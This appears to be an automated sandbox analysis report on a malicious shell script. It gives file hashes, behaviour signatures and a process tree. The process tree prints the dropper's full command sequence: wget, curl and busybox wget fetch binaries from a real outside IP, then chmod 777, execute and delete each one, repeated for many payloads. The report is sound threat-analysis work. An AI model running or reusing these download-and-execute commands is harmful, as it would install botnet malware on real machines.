Analysis
-
max time kernel
22s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
10-11-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
-
Size
10KB
-
MD5
0aab00d4e7063c05a4a2623bcf37a039
-
SHA1
f155f96de5ba4dba0e81f04fc0b9739488955248
-
SHA256
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574
-
SHA512
e4d19d1c05c96c81636e67f4a78b9021ac9ee306b17c30fbdf68f0f3bc52d9a0b7a2d1fb6706b5a507f7b1bbca57e1a2c5875c4dbe57c90cb180aeeafc800b0c
-
SSDEEP
192:U4GT9Uq+r7f9jOytEsjARO9Uq+r7fOOytEsOQ:U4GmJ/ARHfQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
Executes dropped EXE 28 IoCs
Processes:
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
Processes
-
/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh1⤵PID:1479
-
/bin/rm/bin/rm bins.sh2⤵PID:1480
-
/usr/bin/wgetwget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1481
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Writes file to tmp directory
PID:1485 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1486
-
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:1487 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:1488 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1489
-
/usr/bin/wgetwget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1490
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Writes file to tmp directory
PID:1491 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1492
-
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:1493 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:1494 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1495
-
/usr/bin/wgetwget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1496
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Writes file to tmp directory
PID:1498 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1499
-
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:1500 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:1501 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1502
-
/usr/bin/wgetwget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1503
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Writes file to tmp directory
PID:1504 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1505
-
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:1506 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:1507 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1508
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1509
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Writes file to tmp directory
PID:1510 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1511
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:1512 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:1513 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1514
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1515
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Writes file to tmp directory
PID:1516 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1517
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:1518 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:1519 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1520
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1521
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Writes file to tmp directory
PID:1522 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1523
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:1524 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:1525 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1526
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1527
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Writes file to tmp directory
PID:1528 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1529
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:1530 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:1531 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1532
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1533
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Writes file to tmp directory
PID:1534 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1535
-
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:1536 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:1537 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1538
-
/usr/bin/wgetwget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1539
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Writes file to tmp directory
PID:1540 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1541
-
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:1542 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:1543 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1544
-
/usr/bin/wgetwget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1545
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Writes file to tmp directory
PID:1546 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1547
-
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:1548 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:1549 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1550
-
/usr/bin/wgetwget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1551
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Writes file to tmp directory
PID:1552 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1553
-
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:1554 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:1555 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1556
-
/usr/bin/wgetwget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1557
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Writes file to tmp directory
PID:1558 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1559
-
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:1560 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:1561 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1562
-
/usr/bin/wgetwget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1563
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Writes file to tmp directory
PID:1564 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1565
-
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:1566 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:1567 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1568
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1569
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Writes file to tmp directory
PID:1570 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1571
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:1572 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:1573 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1574
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1575
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Writes file to tmp directory
PID:1576 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1577
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:1578 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:1579 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1580
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1581
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Writes file to tmp directory
PID:1582 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1583
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:1584 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:1585 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1586
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1587
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Writes file to tmp directory
PID:1588 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1589
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:1590 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:1591 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1592
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1593
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Writes file to tmp directory
PID:1594 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1595
-
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:1596 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:1597 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1598
-
/usr/bin/wgetwget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1599
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Writes file to tmp directory
PID:1600 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1601
-
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:1602 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:1603 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1604
-
/usr/bin/wgetwget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1605
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Writes file to tmp directory
PID:1606 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1607
-
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:1608 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:1609 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1610
-
/usr/bin/wgetwget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1611
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Writes file to tmp directory
PID:1612 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1613
-
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:1614 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:1615 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1616
-
/usr/bin/wgetwget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1617
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Writes file to tmp directory
PID:1618 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1619
-
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:1620 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:1621 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1622
-
/usr/bin/wgetwget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1623
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Writes file to tmp directory
PID:1624 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1625
-
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:1626 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:1627 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1628
-
/usr/bin/wgetwget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1629
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Writes file to tmp directory
PID:1630 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1631
-
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:1632 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:1633 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1634
-
/usr/bin/wgetwget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1635
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Writes file to tmp directory
PID:1636 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1637
-
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:1638 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:1639 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1640
-
/usr/bin/wgetwget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1641
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Writes file to tmp directory
PID:1642 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1643
-
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:1644 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:1645 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1646
-
/usr/bin/wgetwget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1647
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Writes file to tmp directory
PID:1648 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1649
-
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:1650 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:1651 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1652
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97